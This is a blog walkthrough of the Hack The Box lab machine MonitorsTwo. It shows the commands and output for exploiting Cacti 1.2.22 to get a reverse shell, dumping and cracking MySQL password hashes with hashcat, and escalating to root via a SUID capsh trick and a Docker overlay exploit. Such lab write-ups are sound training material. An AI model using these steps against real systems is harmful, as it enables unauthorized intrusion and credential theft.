The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks

The Be Sure Blog banner

MonitorsTwo: Use two exploits, crack the BCrypt hash and escalate privileges

posted on 19.8.2023 by Below Surface in "Hack The Box"

Let's start with a port scan:

sudo nmap -sCV 10.10.11.211

Relevant output:

PORT  STATE SERVICE VERSION
22/tcp open ssh    OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|  3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|  256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http   nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Login to Cacti
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's paste the IP address into a browser and visit the website. We see that Cacti v1.2.22 is used. A short Google search shows us that there is an exploit for that, which should give us a basic reverse shell (https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22).

Step 1: Start a Netcat listener on port 443

ncat -lvnp 443

Then in another terminal window (exchange "ip" with the target machines IP address, LHOST is your own IP address for the reverse shell):

git clone https://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22.git 
cd CVE-2022-46169-CACTI-1.2.22
python3 CVE-2022-46169.py  -u http://ip --LHOST=10.10.14.102 --LPORT=443

Output:

Checking...
The target is vulnerable. Exploiting...
Bruteforcing the host_id and local_data_ids
Bruteforce Success!!

And in the Netcat terminal, we get the incoming connection:

cat: Connection from 10.10.11.211:52408.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@50bca5e748b0:/var/www/html$ whoami
whoami
www-data

Running the command

ls -la /

Shows us that we seem to be in a Docker container. But there is also a file called "entrypoint.sh"

cat /entrypoint.sh

Reveals:

#!/bin/bash
set -ex
wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
   mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
   mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
   mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
chown www-data:www-data -R /var/www/html
# first arg is `-f` or `--some-option`
if [ "${1#-}" != "$1" ]; then
       set -- apache2-foreground "$@"
fi
exec "$@"

We got login credentials for MySQL. Run:

mysql --host=db --user=root --password=root cacti -e "show tables"

Then we want to view the table "user_auth":

mysql --host=db --user=root --password=root cacti -e "select * from user_auth"

Success, we got credentials:

username: admin
password: $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC
username: guest
password: 43e9a4ab75570f5b
username: marcus
password: $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C

Asking ChatGPT about the password hashes of the users admin and marcus reveal that they are BCrypt hashes, which are hard to crack.

Let's then crack the password for marcus:

hashcat -a 0 -m 3200 '$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C' /usr/share/wordlists/rockyou.txt

Success!

$2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C:funkymonkey
ssh marcus@10.10.11.211
password: funkymonkey

We are logged in!

cat user.txt


Time for privilege escalation. Since we know the www user of our reverse shell seems to be inside a Docker container, we can now gather further information:

docker -v
Docker version 20.10.5+dfsg1, build 55c4c88

Google provides us with an exploit for Docker 20.10.5 (https://github.com/UncleJ4ck/CVE-2021-41091). However we need to set the setuid on /bin/bash correctly to use this one.

In the www-data reverse shell, run:

find / -perm -u=s -type f 2>/dev/null

Outputs:

/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/newgrp
/sbin/capsh
/bin/mount
/bin/umount
/bin/su

On GTFOBins we find an exploit for "capsh".

cd /sbin
./capsh --gid=0 --uid=0 --
whoami

-> root

Now we can give SUID permissions to "/bin/bash"

chmod u+s /bin/bash


Now log into the server as marcus via SSH again, or use the open connection, if you still have.

mkdir temp
nano myexp.sh

Paste the code from

https://github.com/UncleJ4ck/CVE-2021-41091/blob/main/exp.sh

Then save and exit the editor, run:

bash myexp.sh
type "yes"

Relevant output:

[!] Rooted !
[>] Current Vulnerable Path: /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged

Run:

cd /var/lib/docker/overlay2/c41d5854e43bd996e128d647cb526b73d04c9ad6325201c85f73fdba372cb2f1/merged/bin
./bash -p
whoami

-> root

cd /root
cat root.txt

Finished!


Did not lead anywhere, but is nice to know:

Analyzing the hash of the user "guest" reveals:

hashid 43e9a4ab75570f5b                                            
Analyzing '43e9a4ab75570f5b'
[+] MySQL323

So, let's try this quickly (-m 200 for MySQL323):

hashcat -a 0 -m 200 '43e9a4ab75570f5b' /usr/share/wordlists/rockyou.txt

Success!

43e9a4ab75570f5b:admin

So:

username: guest
password: admin

The credentials do not work, so they are not relevant for this machine.

Tags:

hack the box
docker
exploits
bash
privilege escalation
hashcat
bcrypt hash
bcrypt crack

Sources:

https://app.hackthebox.com/machines/MonitorsTwohttps://github.com/FredBrave/CVE-2022-46169-CACTI-1.2.22https://www.linkedin.com/pulse/htb-monitorstwo-writeup-divyanshu-sharmahttps://github.com/UncleJ4ck/CVE-2021-41091https://gtfobins.github.io/gtfobins/capsh/#suid

More posts of this category

Meow: How to pwn the machine (Nmap, Telnet)

Use nmap and telnet to get the flag

Hack The Box

Fawn: Pwn the machine (FTP)

Find the open FTP port and extract the flag!

Hack The Box

Dancing: Pwn the machine (SMB)

How to retrieve the flag with SMB (Server-Message-Block)

Hack The Box

Redeemer: Pwn the machine and capture the flag (Redis)

How to get the flag from the Redis database

Hack The Box

Appointment: Use SQL-Injection to pwn the machine

How to extract the flag by logging in without a password

Hack The Box

Sequel: Access a MariaDB instance with default credentials

Scan for the open ports, log into the database and get the flag!

Hack The Box

Crocodile: Capture the flag! (FTP, Gobuster)

Get credentials via the open FTP port and use Gobuster to find the login file

Hack The Box

Responder: Crack the password hash and login as admin

Use Nmap, modify the hosts file and exploit LFI to grab the hash and crack it

Hack The Box

Three: Get a reverse shell via AWS S3

Use Nmap, Gobuster, Ncat, PHP and the AWS CLI to capture the flag

Hack The Box

Archetype: From user to admin

Make good use of nmap, smbclient, mssqlclient, xp_cmdshell, winPEAS & psexec

Hack The Box

Oopsie: Modify the login cookie, escalate privileges and get the flag!

Upload a PHP reverse shell, get user and then root privileges to pwn the machine

Hack The Box

Vaccine: Pwn the machine (zip2john, hashcat, sqlmap)

Crack the .zip archive, use sql injection and escalate your privileges to get the flags

Hack The Box

Unified: Exploit Log4j, modify a MongoDB entry and get the flags

Log4j exploitation, HTTP request modification & privilege escalation

Hack The Box

Explosion: Use xfreerdp to connect to the service

Make use of the poorly configured service and get the flag

Hack The Box

Preignition: Use Gobuster and default credentials

Gobuster is used to find the login page of the server by dir busting

Hack The Box

Mongod: Use the MongoDB cli to get the flag

MongoDB is a NoSQL database. Use the mongo cli to pwn the machine

Hack The Box

Synced: Use Rsync to browse public shares

Rsync is a fast file copying tool. We will use it to download the flag

Hack The Box

Ignition: Use Gobuster and a common used password

Modify the hosts file, do dir busting and try common passwords to get the flag

Hack The Box

Bike: Exploit a Node.js template engine vulnerability

Insert malicious code to leave the sandbox and get the flag!

Hack The Box

Funnel: Use local port forwarding to access the PostgreSQL DB

Since we can't interact with the DB directly, we use tunneling

Hack The Box

Pennyworth: Remote command execution vulnerability

Default credentials help us to execute Groovy Script code to get a reverse shell

Hack The Box

Tactics: Get the flag via Samba Client or psexec.py

Browse the Windows shares with default credentials and extract the flag

Hack The Box

Included: Local file inclusion, reverse shell and privilege escalation

Use TFTP, get a reverse shell, build and upload an Alpine image with root

Hack The Box

Markup: Use XXE Injection and privilege escalation to get the flag

Nmap, BurpSuite, Ncat, default credentials and misconfigurations

Hack The Box

Base: PHP Type Juggling, Arbitrary File Upload, clear text credentials

Use BurpSuite, Netcat, SSH, Gobuster and PHP to get a reverse shell

Hack The Box

Sau: Use Server Side Request Forgery to pwn the machine

Exploit known vulnerabilities and capture the flags

Hack The Box

Pilgrimage: Use various exploits to get the two flags

Git Repo Dump, Arbitrary File Read, Remote Code Execution

Hack The Box

Topology: Use LaTeX Injection and Hashcat

Get the credentials and crack the password hash to get the flags

Hack The Box